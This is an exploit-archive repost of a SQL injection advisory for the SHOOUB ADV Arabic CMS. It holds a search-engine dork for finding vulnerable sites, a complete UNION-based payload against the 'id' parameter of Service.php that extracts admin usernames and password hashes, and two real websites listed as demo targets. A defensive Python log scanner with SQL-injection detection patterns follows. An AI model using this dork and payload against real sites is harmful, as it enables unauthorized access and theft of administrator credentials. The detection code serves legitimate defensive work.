SHOOUB ADV ARABIC CMS SQL injection

CVE: -
Category: CWE-89
Price: $500
Severity: High
Author: ShoOoB
Risk: High
Exploitation Type: Remote
Date: 2019-05-13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050138

Below is a copy:

SHOOUB ADV ARABIC CMS SQL injection
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: SHOOUB ADV ARABIC CMS SQL injection
# Date: 2019-05-11
# Dork : intext:"SHOOUB ADV" inurl:*id=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.adv.shooub.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+]  parameter  : ID == php?ID=
=================================================================================
Mode Hash : MD5 
=================
[#] Testing Method:

[+] - UNION query

=================================================================================
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<-> #Be sure to install the NoRedirect add-ons and add the index.php to it

Exploit ==> 
Service.php?id=-1' Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,Username,0x3c62723e,0x70617373,0x203d3d3e20,Password,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,Username,0x3c62723e,0x70617373,0x203d3d3e20,Password,0x3c62723e,0x3c62723e))))x),4,[Number of columns]-- -

<-> #At all sites, Column 2 or 3 is 100% vulnerable
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://blue-fields.net/Service.php?id=[SQL]
[+] http://sadv.sa/E/Service.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
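
A detection sketch for the issue described above, added here as an example (it is not part of the original advisory or the vendor's code): it scans web access logs for requests to Service.php whose id parameter is not a plain integer or carries the UNION / user-variable / hex-CONCAT markers seen in the payload. Assumptions: combined-format access logs, legitimate id values are non-negative integers, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: Apache/Nginx "combined"-style access log lines.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Markers modelled on the payload style shown in the advisory.
MARKERS = {
    "union_select": re.compile(r"\bunion\b[\s(/*+]*(?:all\s+)?select\b", re.I),
    "user_variable": re.compile(r"@\w+\s*:=", re.I),
    "hex_concat": re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I),
    "sql_comment": re.compile(r"(?:--\s|--$|#|/\*)"),
}

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/May/2019:10:00:01 +0000] "GET /Service.php?id=7 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [13/May/2019:10:00:05 +0000] '
    '"GET /E/Service.php?id=-1%27%20Union%20Select%201,2,3--%20- HTTP/1.1" 200 9310',
    '192.0.2.10 - - [13/May/2019:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 812',
]

def inspect_line(line):
    """Return the list of findings for one log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/service.php"):
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() != "id":
            continue
        # Assumption: a legitimate id is a plain non-negative integer.
        if not re.fullmatch(r"\d+", value):
            findings.append("non_numeric_id")
        findings += [k for k, rx in MARKERS.items() if rx.search(value)]
    return findings

def scan(lines):
    """Map 1-based line number to findings, for lines with any finding."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = inspect_line(line)
        if found:
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, ",".join(found))
```

The non_numeric_id finding alone is the most reliable signal here; the same integer check applied server-side before the query is built, together with a parameterized query, removes the injection point.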
